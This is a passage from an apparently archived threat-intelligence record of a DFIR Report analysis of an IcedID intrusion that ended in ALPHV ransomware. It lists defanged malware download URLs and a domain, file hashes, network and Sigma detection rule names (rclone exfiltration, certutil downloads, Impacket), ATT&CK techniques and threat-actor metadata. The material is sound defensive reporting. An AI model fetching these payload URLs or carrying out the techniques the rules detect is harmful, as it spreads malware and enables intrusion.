skrechelres[.]com\r\nURLs\r\nhttp[:]//85.209.11[.]48:80/download/test1.exe\r\nhttp[:]//85.209.11[.]48:80/download/http64.exe\r\nhttp[:]//85.209.11[.]48:80/download/csss.exe\r\nhttp[:]//85.209.11[.]48:80/ksajSk\r\nhttp[:]//85.209.11[.]48:80/ksaid\r\nhttp[:]//temp[.]sh/VSlAV/http64.exe\r\nComputed\r\ncscs.exe\r\n 99d8c3e7806d71a2b6b28be525c8e10e\r\n 59791ec1c857d714f9b4ad6c15a78191206a7343\r\n 5d1817065266822df9fa6e8c5589534e031bb6a02493007f88d51a9cfb92e89b\r\ncscss.exe\r\n 08fcf90499526a0a41797f8fdd67d107\r\n 7d130ace197f4148932306facfc8d71fa8738d86\r\n c2ddb954877dcfbb62fd615a102ce5fa69f4525abc1884e8fe65b0c2b120cfd4\r\n \r\ncscssss.exe\r\n 26239fa16d0350b2224bfb07e37cbd84\r\n 8837ad1bafb56019a46822da0ed8b468f380c80d\r\n 7d2e705dcaa9f36fb132b7ff329f61dd5d0393c28dcd53b2be1e3ba85c633360\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 26 of 30\n\nccs.exe\r\n2b1b2b271bc78e67beca2dcd04354189\r\nc83da151f26a58aecb24fc6ba4945acb934ee954\r\n bd4876f7efbd18a03bbb401a5dc77ed68ef95c72a3f7be83cef39a4515e0c476\r\nrclone.exe\r\n581cfc2d4e02a16b9b2f8dcb70a46b8b\r\n1d345799307c9436698245e7383914b3a187f1ec\r\n9c5b233efb2e2a92a65b5ee31787281dd043a342c80c7ac567ccf43be2f2843f\r\nBNUfUOmFT2.exe\r\n7ff0241b28d766198743d661a2f67620\r\n27acb306baec022a974db50a90f48183541e12fe\r\n94d6395dcab01250650e884f591956464d582a4f1f5da948055e6d2f0a215ace\r\nconfucius_cpp.exe\r\nfb34b1fb80b053e69d89af5330cd7d4b\r\ne97b00ef58fe081170137536f28df590dbb41a0e\r\ndfa8c282178a509346fb0154e6dbd5fbb0b56c38894ce7d244f5ca26d6820e67\r\ncslite.exe\r\n642bf60f06bb043c4a74d0501597cf5e\r\ne1bc0c7cf030af31522c1160e0c70df5cecbb64a\r\n4103cc8017409963b417c87259af2a955653567cdbf7d5504198dd350f9ef9c1\r\nhttps64.dll\r\n5548caa3b8cdd73b3a56f3f102942882\r\ne43ecd2f6859e4769028fbd7176bb3339393ea22\r\nd8f51dcfe928a1674e8d88029a404005ab826527372422cac24c81467440feb0\r\nhttp64.dll\r\n0decfd5e200803523c0437ff7aac7349\r\nbe8fd3c3507f02785da6f12c9b21ff73638cdf23\r\ncd0e941587672ab1517681a7e3b4f93a00020f8c8c8479a76b9e3555bcd04121\r\nccslt.exe\r\n5cbb08cd26162e8046df17d15ba6e907\r\n41f47f8ee34c9ae7a4bb43b71e3cc85266302e8e\r\n6a6cd64fba34aadad2df808b0fcab89ef26a897040268b24fed694036cc51d6a\r\niwiqocacod.dll\r\nefb019b1999d478a4161a030a5d9302e\r\n514ddcf981d7d8684b3ac20e902f5017292d51c5\r\nbc49622009b29c23ee762fe6f000936eb1c4c1b29496d5382f175c99ad941aac\r\nJNOV0135_7747811.zip\r\n24701208c439b00a43908ae39bbf7de8\r\n25ef7044cdf9b7c17253625a2bd5d2d6fee44227\r\n3336bfde9b6b8ef05f1d704d247a1a8fd0641afaecc6a71f5cfa861234c4317b\r\n[2023.10.11_08-07].vbs\r\n4ff5625e6bd063811ec393b315d2c714\r\n42b188e2e015a72accc50fcbde2d2c81f5258d0b\r\n5bab2bc0843f9d5124b39f80e12ad6d1f02416b0340d7cfec8cf7b14cd4385bf\r\n0370-1.dll\r\nbf15a998fd84bee284ae9f7422bda640\r\ne51217efb6e33fca9f7c5f51e5c3a4ae50499a37\r\nfab34d1f0f906f64f95b9f244ae1fe090427e606a9c808c720e18e93a08ed84d\r\nnetscan.exe\r\na768244ca664349a6d1af84a712083c0\r\n39300863bcaad71e5d4efc9a1cae118440aa778f\r\ne14ba0fb92e16bb7db3b1efac4b13aee178542c6994543e7535d8efaa589870c\r\nnocmd.vbs\r\nd28271ed838464d1debab434ef6d8e37\r\n2741c136b92aca1e890d2b67084c6867d3cbaa87\r\n457a2f29d395c04a6ad6012fab4d30e04d99d7fc8640a9ee92e314185cc741d3\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 27 of 30\n\nrcl.bat\r\n00c3f790f6e329530a6473882007c3e5\r\nb02db8c2b9614e986e58f6e31be686b418f9aba7\r\n6f3a02674b6bbf05af8a90077da6e496cc47dda9101493b8103f0f2b4e4fd958\r\nDetections\r\nNetwork\r\nET INFO Executable Download from dotted-quad Host\r\nETPRO HUNTING Windows BITS UA Retrieving EXE\r\nET HUNTING Suspicious BITS EXE DL From Dotted Quad\r\nET POLICY PE EXE or DLL Windows file download HTTP\r\nET HUNTING SUSPICIOUS Dotted Quad Host MZ Response\r\nETPRO HUNTING Windows BITS UA Retrieving EXE M2\r\nETPRO POLICY Observed MS Certutil User-Agent in HTTP Request\r\nETPRO MALWARE Likely Evil Certutil Retrieving EXE\r\nThreatFox payload delivery (domain - confidence level: 100%)\r\nET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile\r\nThreatFox Cobalt Strike botnet C2 traffic (ip:port - confidence level: 80%)\r\nET INFO Packed Executable Download\r\nET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1\r\nET MALWARE Cobalt Strike Beacon Observed\r\nET MALWARE Win32/IcedID Requesting Encoded Binary M4\r\nET MALWARE Win32/IcedID Request Cookie\r\nET SCAN Potential SSH Scan OUTBOUND\r\nSigma\r\nSearch rules on detection.fyi or sigmasearchengine.com\r\nDFIR Report Public Repo:\r\n8a0d153f-b4e4-4ea7-9335-892dfbe17221: NetScan Share Enumeration Write Access Check\r\ndfbdd206-6cf2-4db9-93a6-0b7e14d5f02f: CHCP CodePage Locale Lookup\r\nDFIR Report Private Repo:\r\n7019b8b4-d23e-4d35-b5fa-192ffb8cb3ee: Use of Rclone to exfiltrate data over an SSH channel\r\na09079c2-e4af-4963-84d2-d65c2fb332f5: Detection of CertUtil Misuse for Malicious File Download\r\n6f77de5c-27af-435b-b530-e2d07b77a980: Impacket Tool Execution\r\n6fc673ac-ec2f-4de8-8a14-a395f1b2b531: Potential CSharp Streamer RAT loading binary from APPDATA\r\n879ddba7-5cb9-484f-88a4-c1d87034166f: Suspicious ScreenConnect Script Execution\r\nSigma Repo:\r\n90f138c1-f578-4ac3-8c49-eecfd847c8b7: BITS Transfer Job Download From Direct IP\r\n10c14723-61c7-4c75-92ca-9af245723ad2: HackTool - Potential Impacket Lateral Movement Activity\r\nb1f73849-6329-4069-bc8f-78a604bb8b23: Remote Access Tool - ScreenConnect Remote Command Execution\r\n90b63c33-2b97-4631-a011-ceb0f47b77c3: Suspicious Execution From GUID Like Folder Names\r\n19b08b1c-861d-4e75-a1ef-ea0c1baf202b: Suspicious Download Via Certutil.EXE\r\nd059842b-6b9d-4ed1-b5c3-5b89143c6ede: File Download Via Bitsadmin\r\ne37db05d-d1f9-49c8-b464-cee1a4b11638: PUA - Rclone Execution\r\n7090adee-82e2-4269-bd59-80691e7c6338: Console CodePage Lookup Via CHCP\r\nd5601f8c-b26f-4ab0-9035-69e11a8d4ad2: CobaltStrike Named Pipe\r\nc8557060-9221-4448-8794-96320e6f3e74: Windows PowerShell User Agent\r\n1edff897-9146-48d2-9066-52e8d8f80a2f: Suspicious Invoke-WebRequest Execution With DirectIP\r\n0ef56343-059e-4cb6-adc1-4c3c967c5e46: Suspicious Execution of Systeminfo\r\n903076ff-f442-475a-b667-4f246bcc203b: Nltest.EXE Execution\r\n5cc90652-4cbd-4241-aa3b-4b462fa5a248: Potential Recon Activity Via Nltest.EXE\r\n624f1f33-ee38-4bbe-9f4a-088014e0c26b: IcedID Malware Execution Patterns\r\nYara\r\nhttps://github.com/The-DFIR-Report/Yara-Rules/blob/main/24952/24952.yar\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 28 of 30\n\nMITRE ATT\u0026CK\r\nLSASS Memory - T1003.001\r\nDCSync - T1003.006\r\nSystem Network Configuration Discovery - T1016\r\nRemote System Discovery - T1018\r\nAutomated Exfiltration - T1020\r\nRemote Desktop Protocol - T1021.001\r\nSystem Owner/User Discovery - T1033\r\nData from Network Shared Drive - T1039\r\nCommonly Used Port - T1043\r\nScheduled Task - T1053.005\r\nPowerShell - T1059.001\r\nWindows Command Shell - T1059.003\r\nVisual Basic - T1059.005\r\nDomain Groups - T1069.002\r\nWeb Protocols - T1071.001\r\nDomain Accounts - T1078.002\r\nSystem Information Discovery - T1082\r\nFile and Directory Discovery - T1083\r\nLocal Account - T1087.001\r\nDomain Account - T1087.002\r\nNetwork Share Discovery - T1135\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 29 of 30\n\nBITS Jobs - T1197\r\nMalicious File - T1204.002\r\nData from Information Repositories - T1213\r\nRegsvr32 - T1218.010\r\nRundll32 - T1218.011\r\nRemote Access Software - T1219\r\nDomain Trust Discovery - T1482\r\nData Encrypted for Impact - T1486\r\nArchive via Utility - T1560.001\r\nPhishing - T1566\r\nService Execution - T1569.002\r\nSystem Language Discovery - T1614.001\r\nIndicator Removal: File Deletion - T1070.004\r\nInternal case #TB24952 #PR29648\r\nSource: https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\r\nPage 30 of 30", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/" ], "report_names": [ "icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bbf66d2d-3d20-4026-a2b5-56b31eb65de4", "created_at": "2025-08-07T02:03:25.123407Z", "updated_at": "2026-04-10T02:00:03.668131Z", "deleted_at": null, "main_name": "ZINC EMERSON", "aliases": [ "Confucius ", "Dropping Elephant ", "EHDevel ", "Manul ", "Monsoon ", "Operation Hangover ", "Patchwork ", "TG-4410 ", "Viceroy Tiger " ], "source_name": "Secureworks:ZINC EMERSON", "tools": [ "Enlighten Infostealer", "Hanove", "Mac OS X KitM Spyware", "Proyecto2", "YTY Backdoor" ], "source_id": "Secureworks", "reports": null }, { "id": "7a8dbc5e-51a8-437a-8540-7dcb1cc110b8", "created_at": "2022-10-25T16:07:23.482856Z", "updated_at": "2026-04-10T02:00:04.627414Z", "deleted_at": null, "main_name": "Confucius", "aliases": [ "G0142" ], "source_name": "ETDA:Confucius", "tools": [ "ApacheStealer", "ByeByeShell", "ChatSpy", "Confucius", "MY24", "Sneepy", "remote-access-c3", "sctrls", "sip_telephone", "swissknife2" ], "source_id": "ETDA", "reports": null }, { "id": "6e23ce43-e1ab-46e3-9f80-76fccf77682b", "created_at": "2022-10-25T16:07:23.303713Z", "updated_at": "2026-04-10T02:00:04.530417Z", "deleted_at": null, "main_name": "ALPHV", "aliases": [ "ALPHV", "ALPHVM", "Ambitious Scorpius", "BlackCat Gang", "UNC4466" ], "source_name": "ETDA:ALPHV", "tools": [ "ALPHV", "ALPHVM", "BlackCat", "GO Simple Tunnel", "GOST", "Impacket", "LaZagne", "MEGAsync", "Mimikatz", "Munchkin", "Noberus", "PsExec", "Remcom", "RemoteCommandExecution", "WebBrowserPassView" ], "source_id": "ETDA", "reports": null }, { "id": "caf95a6f-2705-4293-9ee1-6b7ed9d9eb4c", "created_at": "2022-10-25T15:50:23.472432Z", "updated_at": "2026-04-10T02:00:05.352882Z", "deleted_at": null, "main_name": "Confucius", "aliases": [ "Confucius", "Confucius APT" ], "source_name": "MITRE:Confucius", "tools": [ "WarzoneRAT" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434120, "ts_updated_at": 1775792018, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/d2f3594bc3abe99b58c93498d4a80b3a84308728.pdf", "text": "https://archive.orkl.eu/d2f3594bc3abe99b58c93498d4a80b3a84308728.txt", "img": "https://archive.orkl.eu/d2f3594bc3abe99b58c93498d4a80b3a84308728.jpg" } }